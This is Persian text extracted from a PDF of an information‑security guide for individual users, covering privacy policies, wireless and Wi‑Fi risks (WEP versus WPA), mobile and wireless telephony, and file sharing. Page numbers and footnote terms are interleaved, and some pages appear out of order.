‫‪٩٣‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ‬
‫ﺍﻓﺮﺍﺩ‪ ،‬ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻋﻼﻡ ﺷﺪﻩ ﺩﺍﺭﻧـﺪ‪ .‬ﺍﻳـﻦ ﺳﻴﺎﺳـﺘﻬﺎ ﻣـﺸﺨﺺ‬
‫ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﭼـﻪ ﻧـﻮﻉ ﺍﻃﻼﻋـﺎﺗﻲ ﺭﺍ ﻣـﻲﺗـﻮﺍﻥ ﺩﺭ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ‬
‫ﺟﻤﻊﺁﻭﺭﻱ ﻧﻤﻮﺩ‪ ،‬ﺑﺎ ﺁﻥ ﺩﺍﺩﻩﻫﺎ ﭼﻪ ﻛﺎﺭﻱ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﻳﺎ ﻧﻤﻲﺗﻮﺍﻥ‬
‫‪Expired‬‬
‫‪Privacy Policy‬‬
‫‪92‬‬
‫‪93‬‬
‫ﺍﻧﺠﺎﻡ ﺩﺍﺩ‪ ،‬ﻭ ﻧﻴﺰ ﺍﻳﻨﻜﻪ ﭼﮕﻮﻧﻪ ﺑﺎﻳﺪ ﺍﺯ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﺣﻔﺎﻇﺖ ﻛـﺮﺩ‪.‬‬
‫ﻛﻠﻴﺔ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺑﻲ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺩﻱ ﻳﺎ ﻣـﺎﻟﻲ ﺟﻤـﻊﺁﻭﺭﻱ‬
‫ﻣﻲﻛﻨﻨـﺪ ﺑﺎﻳـﺪ ﺍﺯ ﻳـﻚ ﺳﻴﺎﺳـﺖ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﻣﻨﺎﺳـﺐ ﻭ‬
‫ﺍﻋﻼﻡﺷﺪﻩ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺍﻧﺘﻘﺎﻝ ﺑﻲﺳﻴﻢ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﻭ‬
‫ﻻ‬
‫ﺗﻮﺳــﻌﻪﻳﺎﻓﺘــﻪ ﺭﻭ ﺑــﻪ ﺍﻓــﺰﺍﻳﺶ ﺍﺳــﺖ‪ .‬ﺍﻳــﻦ ﻓﻨــﺎﻭﺭﻱ ﻣﻌﻤــﻮ ﹰ‬
‫ﻛﻢﻫﺰﻳﻨﻪﺗﺮ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺳـﻴﻤﻲ ﺍﺳـﺖ‪ ،‬ﺩﺭ ﺍﻣـﺎﻛﻦ ﺧـﺼﻮﺻﻲ‬
‫ﺭﺍﺣﺖﺗﺮ ﻭ ﺳﺮﻳﻌﺘﺮ ﻧﺼﺐ ﻣﻲﺷﻮﺩ ﻭ ﺍﺷﻜﺎﻻﺕ ﺗﻨﻈﻴﻤﻲ ﻛﻤﺘـﺮﻱ‬
‫ﺩﺍﺭﺩ‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﻓﻨـﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﺩﺍﺭﺍﻱ ﺩﻭ ﻣـﺸﻜﻞ ﺑـﺎﻟﻘﻮﻩ‬
‫ﺍﺳﺖ‪:‬‬
‫•‬
‫ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻴﺎﻧﺔ ﺍﻧﺘﻘﺎﻝ ﺩﺯﺩﻳﺪﻩ ﺷﻮﺩ‪.‬‬
‫•‬
‫ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻣﻜﺎﻥ‪ ،‬ﺁﺏ ﻭ ﻫﻮﺍ‪ ،‬ﺯﻣﺎﻥ ﺭﻭﺯ‪ ،‬ﻧﺰﺩﻳـﻚ ﺑـﻮﺩﻥ‬
‫ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﺩﻳﻮﻳﻲ‪ ،‬ﺳﺮﻋﺖ ﺍﻧﺘﻘﺎﻝ ﺧﻂ‪ ،‬ﻛﻴﻔﻴﺖ ﻧﺼﺐ ﻭ‬
‫ﺗﺪﺍﺧﻠﻬﺎﻱ ﻣﺨﺮﺏ‪ ،‬ﺳﺮﻋﺖ ﻭ ﻛﻴﻔﻴﺖ ﺍﻧﺘﻘﺎﻝ ﻣﻤﻜﻦ ﺍﺳﺖ‬
‫ﻣﺘﻔﺎﻭﺕ ﺑﺎﺷﺪ‪.‬‬
‫ﺩﺭ ﻣﻮﺭﺩ ﺩﺳﺘﺔ ﺩﻭﻡ ﻣﺸﻜﻼﺕ‪ ،‬ﻛﺎﺭ ﺯﻳﺎﺩﻱ ﻧﻤﻲﺗﻮﺍﻥ ﺍﻧﺠـﺎﻡ ﺩﺍﺩ‪.‬‬
‫ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺍﺯ ﺧﺼﻮﺻﻴﺎﺕ ﻓﻨـﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﻭ ﺍﺯ ﻫﺰﻳﻨـﻪﻫـﺎﻳﻲ‬
‫ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑـﻲﺳـﻴﻢ ﺑﺎﻳـﺪ ﭘﺮﺩﺍﺧـﺖ‬
‫ﺷﻮﻧﺪ‪ .‬ﺭﺍﻩ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺩﺯﺩﻱ ﻣﻴﺎﻥ ﺭﺍﻩ‪ ٩٤‬ﻧﻴﺰ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺷـﻬﺎﻱ‬
‫ﻣﺨﺘﻠﻒ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳﺖ )ﺑـﺮﺍﻱ ﺟﺰﺋﻴـﺎﺕ ﺑﻴـﺸﺘﺮ ﺩﺭ ﻣـﻮﺭﺩ ﺭﻭﺷـﻬﺎﻱ‬
‫ﺭﻣﺰﮔــﺬﺍﺭﻱ ﺿـــﻤﻴﻤﺔ ‪ ۱‬ﺍﺯ ﻫﻤــﻴﻦ ﺑﺨـــﺶ ﺭﺍ ﻣﻄﺎﻟﻌــﻪ ﻛﻨﻴـــﺪ(‪ .‬ﺍﮔـــﺮ‬
‫ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ ﺍﻱ ﺩﺍﺭﻳﺪ ﻛﻪ ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬
‫ﻣﻲﻛﻨﺪ ﺣﺘﻤﹰﺎ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ )ﻣﺜﻞ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻣﺒﺘﻨـﻲ ﺑـﺮ‬
‫‪ .(SSL‬ﺍﮔﺮ ﺍﺯ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻣﺒﺘﻨـﻲ ﺑـﺮ ‪ POP‬ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲ ﻛﻨﻴﺪ ﺑﺎﻳﺪ ﮔﺰﻳﻨﺔ ‪ APOP‬ﺭﺍ ﺍﻧﺘﺨـﺎﺏ ﻧﻤﺎﻳﻴـﺪ ﺗـﺎ ﺭﻣﺰﻫـﺎﻱ‬
‫ﻋﺒﻮﺭ ﻗﺒﻞ ﺍﺯ ﺍﺭﺳﺎﻝ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﻭﻳﮋﮔﻲ ‪ -‬ﻣـﺴﺘﻘﻞ ﺍﺯ‬
‫ﺭﺳﺎﻧﺔ ﺍﻧﺘﻘﺎﻝ ‪ -‬ﺍﻣﻨﻴﺖ ﭘﺎﻳﺎﻧﻪ ﺑﻪ ﭘﺎﻳﺎﻧﻪ‪ ٩٥‬ﺭﺍ ﺑﺮﺁﻭﺭﺩﻩ ﻣﻲﻛﻨﺪ‪ .‬ﺍﮔـﺮ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺯ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﺪ ﺑﺎﻳﺪ ﺍﺯ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ‬
‫ﻓﻨﺎﻭﺭﻱ ﺁﮔﺎﻩ ﺑﺎﺷﻴﺪ ﻭ ﺩﺭﺻﻮﺭﺕ ﻟـﺰﻭﻡ ﺗـﺼﻤﻴﻢ ﺑﮕﻴﺮﻳـﺪ ﻛـﻪ ﺍﺯ‬
‫ﺍﺭﺗﺒﺎﻁ ﭼﮕﻮﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬
‫‪Interception‬‬
‫‪End-to-End Security‬‬
‫‪94‬‬
‫‪95‬‬
‫‪٨٩‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫‪ 802.11‬ﻳﺎ ‪Wi-Fi‬‬
‫‪ 802.11‬ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﺔ ‪IEEE‬‬
‫ﻣﺘﺄﺳــﻔﺎﻧﻪ ﭼﻨــﺪﻳﻦ ﺁﺳــﻴﺐﭘــﺬﻳﺮﻱ ﺩﺭ ﺍﻏﻠــﺐ ﭘﻴــﺎﺩﻩﺳــﺎﺯﻳﻬﺎﻱ‬
‫‪ Wi-Fi‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫•‬
‫ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﺍﺻﻠﻲ‪ ،‬ﺍﺭﺗﺒﺎﻁ ﺍﻳﻤﻦ ﻭ ﻣﻄﻤﺌﻨﻲ ﺑﺎ ﻳﻜـﺪﻳﮕﺮ‬
‫ﻧﺪﺍﺭﻧﺪ‪.‬‬
‫•‬
‫ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﺍﺭﺗﺒﺎﻁ ﺷﺒﻜﻪﺍﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﺎ ﻓـﺮﺩ ﺩﻳﮕـﺮﻱ‬
‫ﺑﻪﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﻳﺪ‪ ،‬ﺑﺎﻳﺪ ﻧـﺎﻡ ﺷـﺒﻜﺔ ﺧـﻮﺩ )‪ (SSID‬ﺭﺍ ﺍﺯ‬
‫ﺣﺎﻟﺖ ﭘﻴﺶﻓﺮﺽ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ ﻭ ﺁﻧﺮﺍ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴـﺪ‬
‫ﻛﻪ ﻧﺎﻡ ﺁﻥ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﻏﻴـﺮ ﻣﺠـﺎﺯ ﻗﺎﺑـﻞ ﺭﺅﻳـﺖ ﻧﺒﺎﺷـﺪ‪.‬‬
‫ﺩﺭﺻﻮﺭﺕ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺗﻨﻬﺎ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ‪ SSID‬ﺭﺍ ﻣـﻲ‪-‬‬
‫ﺩﺍﻧﻨﺪ ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧﺴﺖ ﺁﻥ ﺍﺭﺗﺒﺎﻁ ﺷﺒﻜﻪﺍﻱ ﺭﺍ ﺑﺒﻴﻨﻨﺪ‪.‬‬
‫•‬
‫ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺁﻥ )‪ (WEP‬ﺿﻌﻴﻒ ﺍﺳﺖ ﻭ ﺑﺴﺎﺩﮔﻲ‬
‫ﻣﻲ ﺗﻮﺍﻧﺪ ﺷﻜﺴﺘﻪ ﺷﻮﺩ‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺩﺭ ﻏﻴﺎﺏ ﺭﻭﺷـﻬﺎﻱ‬
‫ﺑﻬﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺁﻧﺮﺍ ﻓﻌﺎﻝ ﺳﺎﺯﻳﺪ‪ .‬ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ‬
‫ﺍﮔﺮ ﻓﺮﺩﻱ ﻭﺍﻗﻌﹰﺎ ﺑﺨﻮﺍﻫﺪ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ )ﻣﺎﻧﻨﺪ ﺭﻣـﺰ‬
‫ﻋﺒــﻮﺭ( ﺭﺍ ﺑﺮﺭﺳــﻲ ﻛﻨــﺪ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳــﻦ ﺭﻭﺵ ﺑــﺴﻴﺎﺭ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺍﻟﺒﺘﻪ ﻳﻚ ﺭﻭﺵ ﺟﺪﻳﺪ ﺭﻣﺰﻧﮕﺎﺭﻱ‬
‫)‪ (WPA‬ﻭﺟــﻮﺩ ﺩﺍﺭﺩ ﻛــﻪ ﻛﺎﺳــﺘﻴﻬﺎﻱ ‪ WEP‬ﺭﺍ ﺭﻓــﻊ‬
‫ﻣﻲﻛﻨﺪ ﻭ ﺩﺭ ﺗﺠﻬﻴﺰﺍﺕ ﺟﺪﻳﺪﺗﺮ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﺑﺎﺷـﺪ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ ‪Wi-Fi‬‬
‫ﺍﻛﻴﺪﹰﺍ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺗﻠﻔﻨﻬﺎﻱ ﺳﻴﺎﺭ‬
‫ﺗﻠﻔﻨﻬﺎﻱ ﺳﻴﺎﺭ )ﻛـﻪ ﺗﻠﻔﻨﻬـﺎﻱ ﺩﺳـﺘﻲ ﻳـﺎ ﺗﻠﻔﻨﻬـﺎﻱ ﻫﻤـﺮﺍﻩ ﻧﻴـﺰ ﻧﺎﻣﻴـﺪﻩ‬
‫ﻣﻲﺷﻮﻧﺪ( ﺑﻪ ﺷﻜﻞ ﮔﺴﺘﺮﺩﻩﺍﻱ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﺻﻮﺕ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧـﺪ‬
‫ﻭ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻧﻴﺰ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ ﺍﻃﻼﻋـﺎﺕ ﻣـﻮﺭﺩ‬
‫‪Wireless LANs‬‬
‫‪Wireless Fidelity‬‬
‫‪Wired Ethernet‬‬
‫‪96‬‬
‫‪97‬‬
‫‪98‬‬
‫ﺧﻄﻮﻁ ﺩﻭﺭ ﺑﺮﺩ‬
‫ﻻ ﺑـﺎ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﻃﻮﻻﻧﻲ ﺧﺼﻮﺻﹰﺎ ﺑﺮﺍﻱ ﻣﻨﺎﻃﻖ ﺩﻭﺭﺩﺳﺖ ﻣﻌﻤـﻮ ﹰ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺑـﻲﺳـﻴﻢ ﻣﻬﻴـﺎ ﻣـﻲﺷـﻮﺩ‪ .‬ﺍﻳـﻦ ﺧﻄـﻮﻁ‬
‫ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺑﻪ ﭼﻨﺪﻳﻦ ﻛﺎﺭﺑﺮ ﺑﻄﻮﺭ ﻫﻤﺰﻣﺎﻥ ﺧﺪﻣﺎﺕ ﺍﺭﺍﺋـﻪ ﺩﻫﻨـﺪ‪.‬‬
‫ﺍﮔﺮ ﺭﻭﺵ ﺍﻧﺘﻘﺎﻝ ﺑﺼﻮﺭﺕ ﻣـﺴﺘﻘﻴﻢ ﺑﺎﺷـﺪ )ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﺘﻨﻬـﺎﻱ‬
‫ﺑﺸﻘﺎﺑﻲ ﻳﺎ ﺁﻧﺘﻨﻬﺎﻱ ﻳﺎﮔﻲ( ﺍﺳﺘﺮﺍﻕ ﺳـﻤﻊ ﺑـﺪﻭﻥ ﺗﺠﻬﻴـﺰﺍﺕ ﺧـﺎﺹ‬
‫ﺩﺷﻮﺍﺭ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺍﻳﻦ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺩﺭﺻﻮﺭﺕ ﻟﺰﻭﻡ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺎ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺠﻬﻴﺰﺍﺕ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑـﺼﻮﺭﺕ ﺭﻣـﺰﻱ‬
‫ﺩﺭﺁﻳﻨﺪ‪.‬‬
‫ﺗﻠﻔﻨﻬﺎﻱ ﺑﻲﺳﻴﻢ ﺣﻠﻘﺔ ﻣﺤﻠﻲ‬
‫‪٩٩‬‬
‫ﺍﻳــﻦ ﻓﻨــﺎﻭﺭﻱ ﺩﺭ ﻣﻨــﺎﺯﻝ ﻭ ﺍﺩﺍﺭﺍﺕ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻛــﺸﻮﺭﻫﺎ ﺑﻜــﺎﺭ‬
‫ﻣﻲﺭﻭﺩ ﻭ ﻧﺼﺐ ﻛﻢﻫﺰﻳﻨﻪ ﻭ ﺑﻲﻧﻘـﺺ ﺧﻄـﻮﻁ ﺗﻠﻔـﻦ ﺭﺍ ﻣﻴـﺴﺮ‬
‫ﻣﻲﺳﺎﺯﺩ ﻭ ﻣﺸﻜﻼﺗﻲ ﻛﻪ ﺗﺠﻬﻴﺰﺍﺕ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺳﻴﻤﻲ ﺩﺍﺭﻧـﺪ‬
‫ﺭﺍ ﻧﺪﺍﺭﺩ‪ .‬ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺑـﺮﺧﻼﻑ ﺳـﻴﻤﻬﺎﻱ ﻣـﺴﻲ‪ ،‬ﺗﺠﻬﻴـﺰﺍﺕ‬
‫ﺑﻲﺳﻴﻢ ﺩﺭ ﻣﻴﺎﻧـﺔ ﺭﺍﻩ ﻗﺎﺑـﻞ ﺩﺯﺩﻳـﺪﻥ ﻭ ﻓـﺮﻭﺧﺘﻦ ﻧﻴـﺴﺘﻨﺪ‪ ،‬ﺍﻣـﺎ‬
‫ﻫﻤﺎﻧﻨﺪ ﺗﻠﻔﻨﻬﺎﻱ ﺳﻴﻤﻲ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﻣﻮﺩﻡ ﺑـﻪ ﺍﻳـﻦ ﺧﻄـﻮﻁ‬
‫ﻣﺘﺼﻞ ﻣﻲﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺠﺎﻱ ﺍﻃﻼﻋﺎﺕ ﺻﻮﺗﻲ‪ ،‬ﺳـﺎﻳﺮ ﺍﻧـﻮﺍﻉ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺍﻧﺘﻘﺎﻝ ﺩﻫﻨﺪ‪ .‬ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻗﺎﺑـﻞ‬
‫ﺷﻨﻮﺩ ﺑﺎﺷـﺪ‪ .‬ﺑـﺴﺘﻪ ﺑـﻪ ﻣﻮﻗﻌﻴـﺖ ﻣﺤﻠـﻲ‪ ،‬ﻗـﻮﺍﻧﻴﻦ ﻛـﺸﻮﺭﻱ ﻭ‬
‫ﻣﻘﺮﺭﺍﺕ ﻣﺤﻠﻲ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ‪ ISP‬ﺧـﻮﺩ ﺩﺭﺧﻮﺍﺳـﺖ ﻛﻨﻴـﺪ ﻛـﻪ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻥ ﺍﺭﺗﺒﺎﻁ ﺭﺍ ﺑﺮﺭﺳﻲ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﺳﺎﻳﺮ ﻣﺴﺎﺋﻞ ﺍﻳﻨﺘﺮﻧﺘﻲ‬
‫ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ‬
‫ﺩﺭﺻــﻮﺭﺕ ﻭﺟــﻮﺩ ﺑـﻴﺶ ﺍﺯ ﻳــﻚ ﺭﺍﻳﺎﻧــﻪ‪ ،‬ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺎﻳﻠﻬــﺎﻱ‬
‫ﺍﺷﺘﺮﺍﻛﻲ ﻳﻜﻲ ﺍﺯ ﻣﻬﻤﺘﺮﻳﻦ ﻭ ﻛـﺎﺭﺑﺮﺩﻱﺗـﺮﻳﻦ ﺍﺑـﺰﺍﺭ ﻣﻮﺟـﻮﺩ ﺩﺭ‬
‫ﺷﺒﻜﻪ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺩﺭ ﺳﺎﺩﻩﺗﺮﻳﻦ ﺣﺎﻟﺖ‪ ،‬ﺍﻳﻦ ﻭﻳﮋﮔﻲ ﺷـﻤﺎ ﺭﺍ ﻗـﺎﺩﺭ‬
‫ﻣﻲﺳﺎﺯﺩ ﺩﺭﺣﺎﻟﻴﻜﻪ ﺩﺭ ﻳﻚ ﺳﻴﺴﺘﻢ ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﻴﺪ ﺑﻪ ﻓﺎﻳﻠﻬﺎﻱ‬
‫ﻣﻮﺟﻮﺩ ﺩﺭ ﻳﻚ ﺳﻴﺴﺘﻢ ﺩﻳﮕـﺮ ﺩﺳﺘﺮﺳـﻲ ﻳﺎﺑﻴـﺪ‪ ،‬ﺁﻧﻬـﺎ ﺭﺍ ﺗﻐﻴﻴـﺮ‬
‫ﺩﻫﻴﺪ‪ ،‬ﺩﺭ ﺁﻥ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﺟﺪﻳﺪ ﺑﺴﺎﺯﻳﺪ‪ ،‬ﻭ ﻳﺎ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﺟـﻮﺩ‬
‫ﺩﺭ ﺁﻧﺮﺍ ﺣﺬﻑ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺩﻭ ﺳﻴﺴﺘﻢ ﻣﺠﺰﺍ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻫﺮ ﺩﻭ ﺩﺭ ﻳـﻚ‬
‫‪Local Loop Wireless Telephones‬‬
‫‪99‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﺑﺮﺍﻱ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺑـﻲﺳـﻴﻢ‪ ٩٦‬ﻣـﻲﺑﺎﺷـﺪ‪ 802.11 .‬ﻛـﻪ‬
‫ﻣﻌﻤﻮ ﹰﻻ ‪ ٩٧Wi-Fi‬ﻧﺎﻣﻴﺪﻩ ﻣـﻲﺷـﻮﺩ‪ ،‬ﺑﻌﻨـﻮﺍﻥ ﺟـﺎﻳﮕﺰﻳﻦ ﺍﺗﺮﻧـﺖ‬
‫ﺳﻴﻤﻲ‪ ٩٨‬ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧﺎﻧﮕﻲ ﻭ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻛﻴﻔـﻲ‬
‫ﻣﺤﺒﻮﺑﻴﺖ ﻳﺎﻓﺘﻪ ﻭ ﻣـﺰﻳﺘﺶ ﺍﺭﺯﺍﻥ ﺑـﻮﺩﻥ ﻭ ﺳـﺮﻋﺖ ﻧـﺴﺒﻲ ﺁﻥ‬
‫ﺍﺳﺖ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺗﻠﻔﻦ ﺳﻴﺎﺭ ﻣﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﻣﻮﺭﺩ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻭ ﺷﻨﻮﺩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ ﻭ ﻟﺬﺍ ﺍﻳﻤﻦ ﻧﻤﻲﺑﺎﺷﻨﺪ‪.‬‬
‫‪٩٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺍﺗﺎﻕ ﻳﺎ ﻫﺮﻛﺪﺍﻡ ﺩﺭ ﻳﻚ ﻧﻴﻤﻜﺮﺓ ﺯﻣﻴﻦ ﺑﺎﺷﻨﺪ‪ .‬ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﺍﻳﻦ‬
‫ﺍﻣﻜﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﺳﺎﺯﺩ ﻛـﻪ ﺩﺭ ﻃـﻮﻝ ﻣـﺴﺎﻓﺮﺗﻬﺎ ﺑﺘﻮﺍﻧﻴـﺪ ﺑـﻪ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﻣﻨﻔﺮﺩ ﻛﻪ ﺑﻌﻨـﻮﺍﻥ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻓﺎﻳـﻞ‪ ١٠٠‬ﻋﻤـﻞ‬
‫ﻣﻲﻛﻨﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﺩﻳﺴﻚ ﺳﺨﺖ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺭﺍﻳﺎﻧﻪ ﺗﻠﻘﻲ‬
‫ﮔﺮﺩﺩ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺑﻴﺸﺘﺮ ﻓﺎﻳﻠﻬـﺎﻱ ﺷـﻤﺎ ﺩﺭ ﺳـﺮﻭﻳﺲ ﺩﻫﻨـﺪﺓ‬
‫ﻓﺎﻳﻞ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﺑﻪ ﺁﻧﻬﺎ‬
‫ﺩﺳﺖ ﻳﺎﺑﻴﺪ‪.‬‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻭﺍﺿﺤﻲ ﻛﻪ ﺩﺭ ﺍﻳﻨﺠﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ‬
